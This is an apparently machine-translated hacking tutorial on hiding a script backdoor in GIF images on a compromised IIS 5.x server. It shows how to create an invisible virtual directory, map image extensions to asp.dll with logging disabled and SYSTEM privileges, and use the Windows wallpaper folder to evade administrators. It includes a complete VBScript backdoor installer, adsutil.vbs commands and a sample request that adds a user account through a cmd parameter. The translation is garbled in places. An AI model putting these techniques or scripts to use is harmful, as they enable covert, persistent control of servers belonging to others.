Two days ago, I read an article on the new method of script injection, and I'm sure a lot of people have learned how to add a script to a picture and how to make a script in a normal ASP (or PHP) file work in a picture by using the Include function.
But the problem with this approach comes along: someone asks: usually if you want to insert a picture in a script Web file, a simple HTML tag solves it, and if we replace it with include, is it too obvious? Although it's a bit of a hassle to manually find this statement on a large page, But if the antivirus software with signature lookup, see include in the. Gif.jpg, such as the end of the statement, I believe it will definitely alarm.
And if we don't have a function like include, How does an ASP (or PHP) statement in a picture execute? Do you want to call network administrator to help? So the question is focused on what methods can be used to replace the function of include, because the script injected into the picture can be changed, so you can not afraid to kill, afraid of the damn include.
What's the way? I thought we could add application mappings to IIS after the invasion, and parse the extensions for pictures like. gif with Asp.dll (or Php.exe), and change the application protection for this virtual directory to low so that our backdoor will have system privileges. When we inject the image script to execute the cmd command, we can post the command we want to execute via the local form, and of course it can be get: code/uploadfiles/newsphoto/xx.coma1.gif?cmd=dir This approach is certainly good and can break through the include execution script. But there is still a shortage, and it is obvious: this way although anti-virus software is not found out, but it can be seen clearly: The administrator just look at the application mapping, then all of our work is in vain.
Thinking about this, I suddenly think of the famous IIS Vulnerability (involving iis5.0 and iis5.1), we can create an invisible virtual directory under any one site (refers to the Intenet Service Manager is not visible, but the use of Adsutil.vbs is still visible), And because of the nature of IIS, application mappings and Application protection for virtual directories are set separately from the default site for IIS. Because the virtual directory is not visible, all of his attributes are certainly not visible.
So we can safely set the properties of this directory without fear of administrator discovery. When we point this virtual directory to another physical directory on the server that is full of pictures (for that directory?) I found a good place: Windowz default wallpaper directory, my xp is%systemroot%\web\wallpaper\ directory ... Oh, what do you think of? Once we modify two of them, inject our script back door, and then map the picture of the catalog to Asp.dll (or Php.exe) and the application protection to low, you can access the command by the way I said above.
And it's system privilege. Oh, is it cool? The administrator will never think of their own pictures will be fatal back door! (In fact, this method of the shark has been in the X file on the article said, but his approach has a flaw: in the non-web directory with ASP (or PHP) files, once found, it is really suspicious. And we are using the picture, I believe that the administrator to see the picture will not be emotional and must be torn open to see a clear to stop it? So how do you create this virtual directory? We can also use the Adsutil.vbs in the graphical interface or directly with IIS.
Before that, let me briefly explain the reason for this IIS vulnerability: We know that the IIS configuration file is Metabase.bin. This file, located in%systemroot%\system32\inetsrv\metabase.bin, contains almost all of the configuration information for IIS and is a very important system file. Simply put, everything we do in the Intenet Service Manager will eventually be saved in Metabase.bin. In addition to operating the Metabase.bin through the Intenet Service Manager in day-to-day system management, Windows provides a script adsutil.vbs can operate on Metabase.bin.
(AdWords) The structure of the metabase is similar to the registry, and it is also a tree structure with concepts like keys, values, and items. In fact, in IIS3 and PWS, the content of metabase is stored in the registry. Metabase has two primary keys: LM and schema. The schema preserves some of the system's default configurations, usually without modification, and is also very dangerous to correct, so neither the Intenet Service Manager nor the Adsutil.vbs provides a mechanism for modifying the schema. LM contains configuration information such as the HTTP service for IIS, the FTP service, the SMTP service, and so on. Among them, lm/w3svc/is the configuration information for the HTTP service we are going to use.
There is a value: ScriptMaps, which represents the script map. When we set the ScriptMaps value in a virtual directory, the file for the specific extension requested for that directory is handed to the specified ISAPI execution. It is important to emphasize that setting the ScriptMaps directory does not necessarily exist, as long as a subkey is built under the root key of an HTTP instance in metabase, HTTP request IIS for the virtual directory with the same name as the key is considered legitimate and is referred to the mapped ISAPI.
It's possible that everyone was dizzy (including me), in fact, a simple analogy: metabase is similar to the registry, we know that when we install some programs, the installer will set up some of the necessary values in the registry, but once we have not formally deleted its installed files ( For example, some friends delete the game is directly to the recycling station to pull the matter, the registry of those items will be left, no use, and caused by the registration form garbage. It's the same thing in metabase, when we build a virtual directory normally, some items are created in metabase. And when we delete this virtual directory by abnormal means, those items will stay, and unlike the registry, those items will work, as long as we use HTTP to request that virtual directory, IIS will still follow the original virtual directory settings in metabase to return smoothly.
So even if the directory does not exist, as long as he has existed, then it is set up. Oh, you understand? (PS: Still not understand) halo, then you have to see the shark's article, he said than I know. As for how to add an invisible virtual directory, the move shark's article made it very clear, I do not have the nonsense here, the following provides the add the invisible virtual directory script, save as Iis.vbs: Code Help1=iis back door setup for Win2000 by action Shark May 30 2004 help2= Please enter the correct virtual directory name and mapped path, as follows help3= cscript.exe iis.vbs virtual directory Name Mapping path help4= For example: cscript.exe iis.vbs backdoor C:\ set args = WScript.Arguments If Args.count < 2 then WScript.Echo Help1 WScript.Echo WScript.Echo Help2 WScript.Echo Wscript.ech O help3 WScript.Echo WScript.Echo help4 Wscript.Quit End If Strvrname=args (0) virtual directory name Strrootpath=args (1) virtual directory path set CHECKV Irtualdir=getobject (Iis://localhost/w3svc/1/root) for each VR in Checkvirtualdir if Vr.name=lhxy then Foundt =yes else fou ndt= no End If Next if Foundt =yes then WScript.Echo found that a lhxy directory has been created, is setting a custom virtual directory Creatvdir Else WScript.Echo is creating the Lhxy directory, and since Define the folder, please wait!
Creatlhxy Creatvdir End If WScript.Echo The name of the virtual directory you created is & Strvrname, and the mapped folder is & Strrootpath &. WScript.Echo Please visit http://ip/lhxy/& strvrname &/to connect the back door! WScript.Echo, Congratulations! The back door setup is complete! Sub Creatlhxy () Set Objdir=getobject (iis://localhost/w3svc/1/root) set Mydir=objdir.create (IISWEBVIRTUALDIR,LHXY) Mydir.accessread=true Mydir.defaultdoc=mydir.defaultdoc mydir.appisolated=0 mydir.accessexecute=true mydir.dontlog =true mydir.accesssource=true mydir.enabledirbrowsing=true Mydir.setinfo End Sub Sub Creatvdir () Set objvirtualdir= GetObject (Iis://localhost/w3svc/1/root/lhxy) set Virdir=objvirtualdir.create (Iiswebvirtualdir,strvrname) Virdir.accessread=true Virdir.path=strrootpath virdir.defaultdoc= virdr.accessexecute=true virdir.accesswrite=true Virdir.accesssource=true virdir.appisolated=0 virdir.dontlog=true virdir.enabledirbrowsing=true virdir.appcreate 0 Viddir.createprocessasuser=0 Virdir.setinfo End Sub Wscript.Quit I remember that Bugkidz also seemed to have posted similar scripts. Oh, do not look carefully, we do not hit me, find their own, or to find boy to, hehe.
The following is a command to add Asp.dll to the InProcessIsapiApps array via adsutil.vbs, so that all ASP scripts execute with System privileges. Code cscript adsutil.vbs Set/w3svc/inprocessisapiapps c:\winnt\system32\idq.dll C:\winnt\system32\inetsrv\httpext.dll C:\winnt\system32\inetsrv\httpodbc.dll C:\winnt\system32\inetsrv\ssinc.dll C:\winnt\system32\msw3prt.dll C:\Winnt \system32\inetsrv\asp.dll but need attention, adsutil.vbs can only be set, can not be changed, so use the Adsutil.vbs when the original also add, otherwise the original will be lost. Separate entries are separated by spaces. Then add your virtual directory to the application mapping: Code cscript adsutil.vbs set w3svc/1/root/lhxy/wofeiwo/scriptmaps gif,c:\winnt\system32\inetsrv\ asp.dll,1 My virtual directory here is Lhxy/wofeiwo, the image extension is. gif you can change according to your actual situation. OK, let's see the effect: Code/uploadfiles/newsphoto/ofeiwoa1.gif?cmd=net user Wofeiwo W1o2f3e4i5w6o/add